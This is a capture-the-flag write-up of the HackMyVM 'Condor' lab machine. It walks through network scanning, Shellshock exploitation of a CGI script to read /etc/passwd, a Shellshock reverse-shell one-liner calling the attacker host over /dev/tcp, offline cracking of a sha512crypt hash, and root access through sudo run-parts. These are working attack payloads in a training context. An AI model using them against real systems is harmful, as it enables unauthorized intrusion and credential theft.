HackMyVM - Condor - Writeup
https://hackmyvm.eu/machines/machine.php?vm=Condor
Find it
└─$ sudo netdiscover -r 10.0.0.0/24 -P 255 ⨯
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:1f:ab:fd 1 60 PCS Systemtechnik GmbH
10.0.0.37 08:00:27:12:4f:50 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
└─$ nmap -T4 -sC -sV -oN nmap.out 10.0.0.37
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-14 17:34 EST
Nmap scan report for 10.0.0.37
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 39:41:db:3a:f0:8f:7d:4d:85:c5:aa:0b:5f:66:ba:a7 (RSA)
| 256 66:89:b1:8e:8b:af:cf:7f:49:c5:7c:e6:4b:b7:d8:5b (ECDSA)
|_ 256 a3:b3:f0:14:a4:4e:05:c0:d1:24:2f:a8:fe:a5:2c:eb (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds
2 ports open ssh & http.
└─$ ssh 10.0.0.37
kali@10.0.0.37: Permission denied (publickey).
Enumerate webserver
└─$ nikto -h http://10.0.0.37
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.0.37
+ Target Hostname: 10.0.0.37
+ Target Port: 80
+ Start Time: 2021-11-14 17:38:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ 8699 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2021-11-14 17:39:57 (GMT-5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto found something in the cgi-bin, give that its own scan after /
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.37/ -x html,php,txt,jpg -o dir-medium.txt --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,txt,jpg
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/11/14 17:43:26 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 183]
/mitnick.jpg (Status: 200) [Size: 40961]
/server-status (Status: 403) [Size: 274]
===============================================================
2021/11/14 17:48:56 Finished
===============================================================
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.37/cgi-bin/ -x cgi,bash,sh,pl,py -o dir-medium.txt --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.37/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,pl,py,cgi,bash
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/11/14 17:52:59 Starting gobuster in directory enumeration mode
===============================================================
/test.cgi (Status: 200) [Size: 20]
/condor.sh (Status: 200) [Size: 137]
┌──(kali㉿kali)-[~/condor]
└─$ curl http://10.0.0.37/cgi-bin/condor.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kevin:x:1000:1000:,,,:/home/kevin:/bin/bash
paulo:x:1001:1001:,,,:/home/paulo:/bin/bash
Getting a shell
After a little trial and error I ended up getting a reverse shell.
https://ethicalhackingguru.com/how-to-exploit-the-shellshock-vulnerability/
┌──(kali㉿kali)-[~/condor]
└─$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.10/1234 0>&1' http://10.0.0.37/cgi-bin/condor.sh
┌──(kali㉿kali)-[~/condor]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.37] 42036
bash: cannot set terminal process group (423): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$
Escalating to User
└─$ cat .i_did_it_again
8395d26f20d997f971919e93edee06d3:$6$TCX.c/9ARPR3KCFE$4ZhsWox9dPa8/CG4O6socHVYYM6cJbtpaBx9cefvABC8gP0vMrWsgBhUUGoAHWnJI.X.NyzP5sbtMpGGfwuS11
307dcfe346e38992d47000630bd19579:$6$gwBgUJgQHGxTex13$b/67Oe7CIvDS85hex4GrHC2RuEkLRfWHAAgimHNyxC/L5biEqSly920uazvDXx3ACrM.srme6Us78aWUEGNAG0
c34040783efce8ebedb253e854c79569:$6$WAq1h/mdGSMb9QVv$aN54cSdOf3TEsGZt94op0s9hDGWwEusVLi8PtfMmzmOl3AMNGgBMJqQaRHxPrpSFJTLB2T.vFnbYKv6eQpzUT1
0edc0358ba098a665397f277d9caa307:$6$n5AKhYSQNaywXCs0$k5X7gxoiRh/rfcUVxLHmFlhINTxnsJrqCPRCQYdKmn8UWtn2.yF8J.zqTrx3q8YdnDbdpzZvKNtK4ZqteGDEO.
dd41cb18c930753cbecf993f828603dc:$6$1tKf9R.0qo7v5DjD$uYneSfO1bb4upW2xlLw.hHGeuAtCunYhdOjQS2MBdnpPcMt0ZiZee42BjDO2jmUJffTXsKdo43SjE4pqM6WqJ/
┌──(kali㉿kali)-[~]
└─$ echo -n paulo|md5sum
dd41cb18c930753cbecf993f828603dc -
┌──(kali㉿kali)-[~/condor]
└─$ cat paulohash
dd41cb18c930753cbecf993f828603dc:$6$1tKf9R.0qo7v5DjD$uYneSfO1bb4upW2xlLw.hHGeuAtCunYhdOjQS2MBdnpPcMt0ZiZee42BjDO2jmUJffTXsKdo43SjE4pqM6WqJ/
┌──(kali㉿kali)-[~/condor]
└─$ john --wordlist=/home/kali/rockyou.txt paulohash
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
p*********3 (dd41cb18c930753cbecf993f828603dc)
1g 0:00:00:00 DONE (2021-11-15 00:37) 1.219g/s 1873p/s 1873c/s 1873C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
bash-4.3$ su paulo
su paulo
Password: p*********3
paulo@condor:/home/kevin$ cd
cd
paulo@condor:~$ ls
ls
user.txt
Escalating to root
https://gtfobins.github.io/gtfobins/run-parts/#sudo
paulo@condor:~$ sudo -l
sudo -l
Matching Defaults entries for paulo on condor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User paulo may run the following commands on condor:
(ALL : ALL) NOPASSWD: /usr/bin/run-parts
paulo@condor:~$ sudo run-parts --new-session --regex '^sh$' /bin
sudo run-parts --new-session --regex '^sh$' /bin
/bin/sh: 0: can't access tty; job control turned off
# id
id
uid=0(root) gid=0(root) groups=0(root)
#
Comments
Post a Comment